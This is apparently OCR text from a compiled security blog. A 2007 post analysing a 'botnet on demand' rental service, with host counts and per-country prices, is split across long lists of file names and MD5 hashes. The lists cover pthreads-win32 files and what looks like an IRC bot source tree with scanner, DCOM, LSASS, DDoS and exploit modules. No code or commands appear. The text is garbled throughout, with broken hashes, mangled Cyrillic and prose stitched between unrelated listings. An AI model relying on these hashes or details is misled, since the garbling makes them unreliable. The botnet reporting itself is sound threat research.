pthread attr _setstacksize.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _barrierattr destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
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pthread _barrierattr getpshared.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _barrierattr _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _barrierattr setpshared.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread barrier destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _barrier _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _barrier _wait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _cancel.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread condattr _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread condattr getpshared.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _condattr _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread condattr _setpshared.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread cond _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread cond _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _cond_signal.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread cond _wait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread delay _np.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _detach.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


pthread _equal.c.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
pthread _exit.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _getconcurrency.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _getschedparam.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _getspecific.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread getw32threadhandle _np.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _join.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread key create.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread key _delete.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _kill.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr_getkind _np.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _getpshared.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr gettype.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _setkind _np.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _setpshared.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr settype.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
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pthread mutex _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _mutex _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _lock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _timedlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _trylock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _unlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread num _processors _np.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _once.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwiockattr destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


pthread _rwlockattr getpshared.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlockattr _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


pthread rwlockattr setpshared.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 
pthread rwiock _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlock _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlock _rdlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwiock _timedrdlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwliock _timedwrlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


pthread _rwiock _tryrdlock.c.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
pthread rwlock _trywrlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread rwlock _unlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread rwlock _wrlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _self.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _setcancelstate.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _setcanceltype.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _setconcurrency.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread setschedparam.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _setspecific.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread spin _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread spin _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread spin _lock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread spin _trylock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread spin _unlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _testcancel.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


pthread timechange handler _np.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 


pthread win32 attach detach _np.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 
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3.10.32 Botnet on Demand Service (2007-10-31 00:45) 


qd CraTuctuka 


Total: 


Ontine: 


OxTeOpe 262007 


Hospe 3a NocnepnMe 2 “aca: 


Ox Tepe 23°2007 Hosme 2a nocnegnne 24 “aca: $238 


OxrsGpe 162007 


Once this "rent a botnet" or "botnet on demand" service depending on the perspective made 
it in the mainstream press, they switched locations, but I’m sure they'll continue to advertise 
themselves given the potential for such a service. The first screenshot provides the "botnet 
inventory", as you can see the botnet has a total 35015 infected hosts, but with only 2342 of 
them online when | last checked. On a per rate of 252 infected hosts for the last two hours, 
and with 5279 for the last 24, their only problem is to have the malware actually respond, and 
"phone back home". 


From another perspective, "rent a botnet" is a bit different as a service concept next to "[1]bot- 
net on demand" where this service is a combination of the two of these. Rent a botnet means 
there’s an already available inventory, that is they’re aware of the exact number of infected 
hosts they have, and are capable of meeting the demand until their supply gets depleted, 
which is where "botnet on demand" comes into play. Botnet on demand, like the entire "on de- 
mand" concept, doesn’t build inventory of infected hosts and sit on them waiting for someone 
to require them. Instead, infected hosts get "infected" as requested, another indication of their 
understanding of what malicious economies of scale is all about - anticipating the success of 
exploiting outdated client side vulnerabilities on a large scale. 
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ptw32 _calloc.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 callUserDestroyRoutines.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 cond check _need _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 decrease semaphore.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _getprocessors.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 increase _semaphore.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


ptw32 _InterlockedCompareExchange.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 
ptw32 is _attr.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 mutex _check _need __init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _new.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _processlnitialize.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _processTerminate.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _reuse.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _rwlock _cancelwrwait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32_rwlock _check _need _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32_spinlock check _need _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _threadDestroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _threadStart.c.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _throw.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _timespec.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _tkAssocCreate.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _tkAssocDestroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
rwlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched _getscheduler.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched get priority _max.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched get priority _min.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched _setscheduler.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched _yield.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
semaphore.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
semaphore.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _close.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _getvalue.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
11444 


sem _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _open.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _post.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _post _multiple.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _timedwait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _trywait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _unlink.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _wait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
signal.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
spin.c.Svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sync.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
tsd.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
w32 _CancelableWait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
attr.c.svn-base 
a12fd4f3434414899195949439858f6f 
barrier.c.svn-base 
532880d3bdd9ef36301d6e7b6aa00d50 
cancel.c.svn-base 
5b13ba000273861c27b9aa50f8bdfc14 
cleanup.c.svn-base 
769e83413dd9bd33f9e1c81f32b761e2 


condvar.c.svn-base 
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302b1c985cad6f88f933b22b3ec74099 
create.c.svn-base 
6b0ab4004f70c7f20f8flad65aa6133e 
dll.c.svn-base 
f08714dcbfeaa5e15b142cff5d123beb 
errno.c.svn-base 
c147795e0a23dac6df29f2546070f789 
exit.c.svn-base 
d9942ff4e0c679aa9c76bec49172a4cf 
fork.c.svn-base 
1097a7c18d03a652f6ea2f804f0ccda9 
global.c.svn-base 
0f2567eb987e512d0e0ef6e540d176e7 
implement.h.svn-base 
0369b8562d00680c8dd5659476b51a67 
misc.c.svn-base 
f455f6fd65b4a2935alel9bca95abff7 
mutex.c.svn-base 
cc91625546ca948b067ea08191ed8355 
need _errno.h.svn-base 
lacf999ab5165cbb7c0b407eaeb0591d 
nonportable.c.svn-base 
476e3132b026ce2915f98e505201a129 
private.c.svn-base 
ac1286d19f9cffded56c450b000d1802 
pthread.c.svn-base 
71e897b73aa86844be42cce3468991a4 
pthread.h.svn-base 
c4add0a9376ea64a2723ca3e2c18fcb6 
pthread attr _destroy.c.svn-base 
5e4c09cc1f07894c258e7adec89ae071 
pthread attr _getdetachstate.c.svn-base 
a5e3409db651914787d3bbdefdcc02b5 
pthread attr _getinheritsched.c.svn-base 
8995dfécdeb495fdc3c83b3bb000b92c 
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pthread attr _getschedparam.c.svn-base 
4f5fdfdbf333c6012e8f36823393e690 
pthread attr _getschedpolicy.c.svn-base 
fecb499c80d985bd5aadb8cc7e33bb91 
pthread attr _getscope.c.svn-base 
69a7c47942a9e4b3d7d982a5fa8cf960 
pthread attr _getstackaddr.c.svn-base 
b26f339cc1f4b7d00174c4443c1223d7 
pthread attr getstacksize.c.svn-base 
d5288657f20f8ed763b8f4e9afe43f2e 
pthread attr _init.c.svn-base 
683a5952e5821df2d6a7ce661691ad20 
pthread attr setdetachstate.c.svn-base 
ddca6b89174eec5513af486559a31cb2 
pthread attr setinheritsched.c.svn-base 
aed7307ebaee866b38f8e2fe9dca4fa9 
pthread attr setschedparam.c.svn-base 
22020c1fdd0ed05b269d751ca8f4el1le0 
pthread attr setschedpolicy.c.svn-base 
ba1891657e9a567446694b7d025123ba 
pthread attr _setscope.c.svn-base 
5fa4c254568e731f68b0bc804f87fa3d 
pthread attr setstackaddr.c.svn-base 
0248c3bb0e55786d74ee6e428023650a 
pthread attr setstacksize.c.svn-base 
25b81793cca5ec56ccdfbf6004e4ce2d 
pthread _barrierattr destroy.c.svn-base 
cdaa8194ef98c88298e9277210793ea4 
pthread _barrierattr _getpshared.c.svn-base 
2f263156b646ea06ae1b569f00c6a344 
pthread _barrierattr _init.c.svn-base 
31432811af847573ccc8fecb493f350c 
pthread _barrierattr setpshared.c.svn-base 
71c0fd0c4905af258c6d72b3a7a7d4f9 


pthread barrier destroy.c.svn-base 
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2d6749b68bba4ddd14al1lfec6992f40e 
pthread barrier _init.c.svn-base 
700c479c972829bd6ea179c73ea5c8C9 
pthread barrier wait.c.svn-base 
b23c55539d7728e5004e8a24caed970c 
pthread _cancel.c.svn-base 
886ec808148ff513ff19d853836964d4 
pthread condattr destroy.c.svn-base 
cfe75ef2c8eddf86ec66af3299a86458 
pthread condattr getpshared.c.svn-base 
d03841c90360c8cad64d37d29ffcc2fe 
pthread condattr init.c.svn-base 
cfe50232c1cf889825700d356cc0870c 
pthread condattr setpshared.c.svn-base 
d99ec12d6779ff6bd951351ec21e9621 
pthread cond _destroy.c.svn-base 
8d991laa0a08b09fd992f023e14c3e551 
pthread cond _init.c.svn-base 
19697294947a0a79ad838ff8d6f2a4e2 
pthread cond _signal.c.svn-base 
a926b0c51410ae6dc34fc7ca65a09d99 
pthread cond _wait.c.svn-base 
6799a3f349588f383533b8e4ele6e6f8 
pthread delay _np.c.svn-base 
7cee60522a639b962d514eCc067504127 
pthread detach.c.svn-base 
c70e762ea975c95e099c6b00a15d744e 
pthread _equal.c.svn-base 
0dd48879e326a289df907cal6db15fde 
pthread _exit.c.svn-base 
ae0a03587f9635efdbb460fd7eae5l1lea 
pthread _getconcurrency.c.svn-base 
5d48952efe0428532d0f848625c7achbe 
pthread _getschedparam.c.svn-base 
fb89a4d06071fc673e64fbd920b30b74 
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pthread _getspecific.c.svn-base 
66a89f4ce67f35e5e66e7ab6ad81ef683 
pthread getw32threadhandle _np.c.svn-base 
d342ea56f7c739a9e96c802376a5512e 
pthread _join.c.svn-base 
8acb6b50a9ff021c671f9d31086d5a51 
pthread key create.c.svn-base 
54e948d2dccf88469c42adcb8ab6e6262 
pthread key delete.c.svn-base 
€661148ddc3a5d1060ea6ed17016c358 
pthread _kill.c.svn-base 
5afa88a135efe3d129307cab947797d3 
pthread mutexattr destroy.c.svn-base 
801e0539a7aa21fel2eae0440f6c112f 
pthread mutexattr_getkind _np.c.svn-base 
8fe3f1b326fce135857b89812a65f0ca 
pthread mutexattr _getpshared.c.svn-base 
0eb5d639acd44f3f27e708bd63c4d960 
pthread mutexattr _gettype.c.svn-base 
0d36b0b667e733bc189419eaf24058d7 
pthread _mutexattr _init.c.svn-base 
0ba2b45d35880a964fa6f2493eb360fFf 
pthread mutexattr setkind _np.c.svn-base 
bf90b30106c4b302ce9a5fb2fb3e4d68 
pthread mutexattr _setpshared.c.svn-base 
660c267e5fb3f635ed2b65cdd8ed3f04 
pthread mutexattr settype.c.svn-base 
3bc9aafc4f4a558b0ab5b8b432103197 
pthread mutex _destroy.c.svn-base 
8223329a896655f6d712074942c9e3eb 
pthread _mutex _init.c.svn-base 
ad448b005f9ceb45d480e3c30ff4071F 
pthread mutex _lock.c.svn-base 
3f2472d8404e683eed467fad157ead37 


pthread mutex _timedlock.c.svn-base 
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4207d8ca7648fd827d0f3359325c3bdb 
pthread mutex __trylock.c.svn-base 
5df4888fe32e44eae80ebf514042ccf9 
pthread mutex _unlock.c.svn-base 
€8b425b17c9d75207e7b22480ae7f129 
pthread num _processors _np.c.svn-base 
daf0c08c4048a2117a71le8lec5fcbccl 
pthread _once.c.svn-base 
700a39e696322589fac2598627c71e60 
pthread _rwlockattr _destroy.c.svn-base 
d1b34b57f886c13f0c662f6e7f085045 
pthread _rwlockattr getpshared.c.svn-base 
bff28c4c6f089cdc3516393316465707 
pthread _rwlockattr _init.c.svn-base 
f73d91e80c6e204f65173deeld56ebee 
pthread rwlockattr setpshared.c.svn-base 
fd231f3c35d8c998cab61ab49714ef24 
pthread rwlock _destroy.c.svn-base 
43d661flcefelda4290f4518917fc851 
pthread _rwlock _init.c.svn-base 
820flbb7bd12aa24a823f2fbfcd13d0a 
pthread _rwlock _rdlock.c.svn-base 
2324cf9542740dd7eefcal0f0b69552a 
pthread rwlock _timedrdlock.c.svn-base 
673b434b4953cb594ea4deab6e512990d 
pthread rwlock _timedwrlock.c.svn-base 
0541d083166be307e58ca21fca47416c 
pthread rwlock _tryrdlock.c.svn-base 
4baa4a2626965b7adf412e5984a34a58 
pthread rwlock _trywrlock.c.svn-base 
838b51c2f629c01ed8951f5 7 bb68ff23 
pthread rwlock _unlock.c.svn-base 
0e3709646dd2611d29979e37c414fc61 
pthread rwlock _wrlock.c.svn-base 
f5fb818049a82ba150323fea4fcae096 
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pthread _self.c.svn-base 
27428a844444dc65b3839ad50eb49da5 
pthread _setcancelstate.c.svn-base 
83cfd164085256ca9bd55d176b561b4a 
pthread _setcanceltype.c.svn-base 
c1b8f99c725652cfa324f33b0107f52a 
pthread _setconcurrency.c.svn-base 
063d0748d3c76e8efd5cd2d905b9f894 
pthread _setschedparam.c.svn-base 
e6dbd63f60f3663c59db44508f6755ca 
pthread _setspecific.c.svn-base 
922ff50b089afc2995b73692de176866 
pthread spin _destroy.c.svn-base 
d9bd2d5159ee30d97c47f6455c6b66b2 
pthread _spin _init.c.svn-base 
b5daa9bf63094a8d4c0821df8c262db5 
pthread spin _lock.c.svn-base 
32820ded10fc73c8946b67f96e4dd659 
pthread spin _trylock.c.svn-base 
75d5e2c4a32a61e52b8870481fec9e10 
pthread spin _unlock.c.svn-base 
464e81862391dfd3f023cd208d1138e7 
pthread _testcancel.c.svn-base 
79597a0d52eddebdea37b23c62c5130a 
pthread timechange handler _np.c.svn-base 
41a050a032b61dc38a2950374ba7413b 
pthread win32 attach detach _np.c.svn-base 
e7dfc38f3730337de6bb6eb17254e621 
ptw32 calloc.c.svn-base 
8d46d098473072b1a2bf1899000265e8 
ptw32 _callUserDestroyRoutines.c.svn-base 
b3624eb0ba9cf49ff4f5253ebfcbbee6 
ptw32 cond check _need _init.c.svn-base 
cad661495450f8f36f03e902394cd74b 


ptw32 decrease semaphore.c.svn-base 


11451 


956148b6e8b6da0d0f28aa81eda21a86 
ptw32 _getprocessors.c.svn-base 
08d377c212d3b4185cb71846e72f6497 
ptw32 increase semaphore.c.svn-base 
6c41079c1baa308f0578c0b3768953f1 
ptw32 _InterlockedCompareExchange.c.svn-base 
32bb362fle8e0987e07c9bf4e4baa721 
ptw32 is _attr.c.svn-base 
29a06dc770445ca530459d82969cf9eb 
ptw32 mutex check _need _init.c.svn-base 
9e5d9e472ec22775a9b2b0c627411720 
ptw32 _new.c.svn-base 
181ccfl1lcaf2724717f4d27d45988375 
ptw32 _processlnitialize.c.svn-base 
ab6a647deaf72f10d7eb71f480a6b007 
ptw32 _processTerminate.c.svn-base 
3d61065810159c1f10526b6c9b81bf55 
ptw32 _reuse.c.svn-base 
fcaa8e0fcf7a4c8406955b3alb09ffe3 

ptw32 _rwlock _cancelwrwait.c.svn-base 
eaaf7ef0b825c610b8968380el1a08bdc 
ptw32 _rwlock check _need _init.c.svn-base 
fal94f24105f6d03f7 76d75df4ce4c2f 

ptw32 spinlock check _need __init.c.svn-base 
e2cf649b117eb37bb36e0ed227afcf00 
ptw32 _threadDestroy.c.svn-base 
2a232cfc406e839ffd7fe2efc0a22198 

ptw32 _threadStart.c.svn-base 
7172fe7956491df4b56ea26acb026083 
ptw32 _throw.c.svn-base 
a967b990c02689c2a0102666c91e0370 
ptw32 _timespec.c.svn-base 
17d7f054e0f26c3a0c8aee49c958bdaa 
ptw32 _tkAssocCreate.c.svn-base 
9f6cf981be1042382e2664651003b792 
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What about the prices? Differentiated pricing on a per country is an interesting pricing 
approach, for instance, 1000 infected hosts in Germany are available for $220, and 1000 
infected hosts in the U.S go for half the price $110. It doesn’t really feel very comfortable 
knowing someone's bargaining with your bandwidth and clean IP reputation, does it? What’s 
worth discussing is the fact that the service isn’t marketed as a [2]DIY DDOS service, but as a 
simple acccess to a botnet one, where the possibilities for abuse are well known to everyone 
reading here. Spamming and phishing mailings, hosting and distribution of malware using 
the rented infrastructure, [3JOSINT through botnets, [4]corporate espionage through botnets, 
pretty much all the ugly practices you can think of. 


If the service was a "rent a botnet" it could have increased its chances of having some- 
thing to do with Storm Worm’s "divide and conquer" approach of segmenting the botnet into 
smaller ones, since Storm Worm is the biggest inventory of infected hosts currently available 
online. But since they offer the "on demand" feature, thereby indicating they’re surveying the 
demand for the service itself before putting more efforts into building the inventory, | doubt 
it’s Storm Worm related. 


1. http: //ddanchev. blogspot .com/2007/05/ddos- on-demand-vs-ddos- extortion. htm 


2. http: //ddanchev. blogspot .com/2007/09/new-ddos-malware-kit-in-wild.htm 
3. http: //ddanchev. blogspot .com/2007/04/osint-through-botnets .htm 
4. http: //ddanchev. blogspot .com/2007/05/corporate-espionage-through- botnets. htm 
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ptw32 _tkAssocDestroy.c.svn-base 
9f69b2ae2fd454a3dff967alf68f8s8df 
rwlock.c.svn-base 
6c39e3f7f9caflc8046f9ee942a88f40 
sched.c.svn-base 
e5a560618fbd7bdd9d6a2ccfeee5cb14 
sched.h.svn-base 
9bf8b221a478f29e4ba542ac4c7c77ee 
sched _getscheduler.c.svn-base 
a5bfa4cfc9db0526ac1308b0f5bf1280 
sched get priority max.c.svn-base 
66dee8363b55d0189924e212e8855cda 
sched _get priority _min.c.svn-base 
983129b53a87d8cf410ab829e4613ae8 
sched _setscheduler.c.svn-base 
e€4777€94623814eb0b216a41eb5776b4 
sched _yield.c.svn-base 
a399aba13412a46fa8e83854ecae8357 
semaphore.c.svn-base 
07fc784f1569d63731270ac84e1065d0 
semaphore.h.svn-base 
90f547b8d8b3ea2b7793960e1708eff6 
sem _close.c.svn-base 
36cfe46bf222eb5ff265e7ed3026b7b8 
sem _destroy.c.svn-base 
47ad61c6b2b306dfbc43650699a30128 
sem _getvalue.c.svn-base 
12afd6893abldbf8d1fal70473e6c8f4 
sem __init.c.svn-base 
a24f7f807ba68cb75059fd344b3bc214 
sem _open.c.svn-base 

85492 7f98fb2be2cd8b7abe2908e39e0 
sem _post.c.svn-base 
d6dcadad29390df5010a0cbd936d18d9 


sem _post _multiple.c.svn-base 
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7117a693be7d93f961d4147422fe6634 
sem _timedwait.c.svn-base 
2a926dd822c8944a299e1bd7b3302fd3 
sem _trywait.c.svn-base 
0204ebf15630d456472396c3f6b42b79 
sem _unlink.c.svn-base 
9128ef69f0f8b8c0920ae4380d3cc939 
sem _wait.c.svn-base 
816f33725f02310a446ea64ffcfaaba6 
signal.c.svn-base 
fe630082ffba5785f007fb8c759a19e2 
spin.c.svn-base 
6d6b2cfef6922a823438ad555f263279 
sync.c.svn-base 
446c403c1c5ecbb19d6a3db57d98eca9 
tsd.c.svn-base 
69c39e05b8f45b3be5e233c7600adf18 
w32 _CancelableWait.c.svn-base 
c7acc65c8be2d6723574b0851a7b69c3 
global.h 650888a1590d495c8dcc59569f6839a0 
md5.h 
92bc91ca9f387209188fa316a4ab9405 
md5c.cpp 7023d118e4970f3630d9aa0acdd0f6b4 
empty-file 

entries 
8722aa0d76368d67368624ad6fda23fe 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
global.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
md5.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
md5c.cpp.svn-base 
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202977d1c96f487abe4ale202dd03b4e 
global.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
md5.h.svn-work 
202977d1c96f487abe4ale202dd03b4e 
md5c.cpp.svn-work 
202977d1c96f487abe4ale202dd03b4e 
global.h.svn-base 
650888a1590d495c8dcc59569f6839a0 
md5.h.svn-base 
92bc91ca9f387209188fa316a4ab9405 
md5c.cpp.svn-base 
7023d118e4970f3630d9aa0acdd0f6b4 
phb.php 
b305f20b831cfb080b0fb0fde973ee43 
pBot.cmds.txt 
2d6156fc9b97e9eacd96e8517180e021 
pBot.php 5a171f78aa22470f518778836f750d33 
advscan.cpp 
92aa6cf90aa0885d23685d20669dc41d 
advscan.h 
5c5f7fo1lb7ed612771lab2bdcO1lab9f9b 
aimspread.cpp 
133afa7596c83adbcb444aae3e5f6298 
aimspread.h 
63faa0d3756eefefbf6189148165c17b 
asn.cpp 
3bc0e696f5c970c585b8628b060bf44e 
asn.h 

906ff1 6ff82cafdd5fldc96bd2c601fb 
commands.cpp 
5b64c5e56583ce86dbf6a412ee43e711 
commands.h 
9599ff04e139b97a6e9472516d9488c9 
configs.h 
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c3faed004123d72868aae3d994648fle 
crypt.cpp 
88a91891f676e8926a240d263d333a9d 
crypt.h 
c2edef9177543e1b8a8611d347d99b66 
dcom.cpp 1915cf34941028fcbe4cc1670d502a00 
dcom.h 
1515fd93ad7196026d7679f5b478alab 
ddos.cpp 7e3fba994bb43937c8f49e47d3f38ccl1 
ddos.h 

04b00c06a3c5642756d5b3bef51cc41b 
defines.h 
9bb10a2205fb135ada82c5f7e34a30c4 
download.cpp 
2b17d55de73f19dfa454d78dd579a966 
download.h 
d9157dc8f81483e56884f62a6473d717 
encrypt.exe 

cabO02f8eal 9ffcf756782bc1056438e3 
exploit.cpp 
ef203c80af5238e846bcf1d0117f4f93 

exploit.h 
6f9c80b3b261014abc627b0627b35873 
externs.h 
a05e45623b4b7ec933e340aa2143ea06 
fphost.cpp 
4ed83bbbb13dd03a096c88ea0b65b80d 
fphost.h eff3d1ba2e46287f3b0d01571aa2ac73 
ftpd.cpp e06bcc127636ebf60b6ed52bb321a617 
ftpd.h 

da4f3d350101ladb59be91cal6fec3be2 
functions.h 
6397ced777b860850ebee98567e5d9 af 
gecko.dsp 
33bfe857e14ed77381f859e9a43bea0e 
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gecko.dsw 
a3b416548ff9eed8ff5f69fac7e3e643 
gecko.ncb 
2788c3387c47782a906a83a2491be3e4 
gecko.opt 
80239d966a5bc8061e1ab682a7cdb616 
gecko.plg 
544b0b4c8166el1ec777233d5e1197b79 
imail.cpp 
0f07762ee4939a7b5adf87b4796f472b 
imail.h 
c7019dc0cc2a3d6c4ba4bfle376f052f 
includes.h 
4184194b53681a55ca9d4b37f7146f08 
info.cpp 7d4234c96193b2a7f6e46d847cd1b939 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
irc.cpp 
a4872e688be85025bbf8a2ffa8971c64 
irc.h 
54cce2573f99793b02b7daeeda5c176f 
loaddlls.cpp 
95809d05770a33cObdbaf44e94b9035d 
loaddlls.h 
16e156ca78e0ba6cd705d803e5b13235 
Isass.cpp 
27284a696b0fd9b36db96e5478397287 
Isass.h 
8d3db94c754b7422e35ed423204b902b 
Misc.aps d2d9b5f48826d6b58fb9b2eb453ada51 
Misc.rc 
0d1724410e35e845b462ecbf0887fa6d 
netbios.cpp 
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fd3958d6elaf752889a20d6be38e6f01 
netbios.h 
10a1535d311b113b8702f6789d1ad1b3 
netdde.cpp 
ea06c222b3cf4fd73aced46b38f64097 

netdde.h 717faa1b591f7b9e0dbca80c3393ac6f 
netutils.cpp 
cfe3e52dd457ba8dd16bf10851d7de99 
netutils.h 
0971a3440d4f9e262625674e145773c0 
passwd.h e59860aac948af8b7e0b19987d664358 
pnp139.cpp 
548cefd328f9fdb9ddladdb648711449 
pnp139.h 48987a70b46d5b562cfe5ee2a5357d5b 
pnp445.cpp 
6cc1a938d483988d95e4529ed7ab/cae 
pnp445.h ea40cd46fb54b877059f5a9f08ddd670 
processes.cpp 
4a345dd631db41ladbf016219bfd07bf6 
processes.h 
d648e2988a7cbd350564502a8e80f30b 
protocol.cpp 
61lafefc8319b79d9e829d7586488319Ff 
protocol.h 
a535fc0859aecal3f3c93ce5614b0290 
regcontrol.cpp 
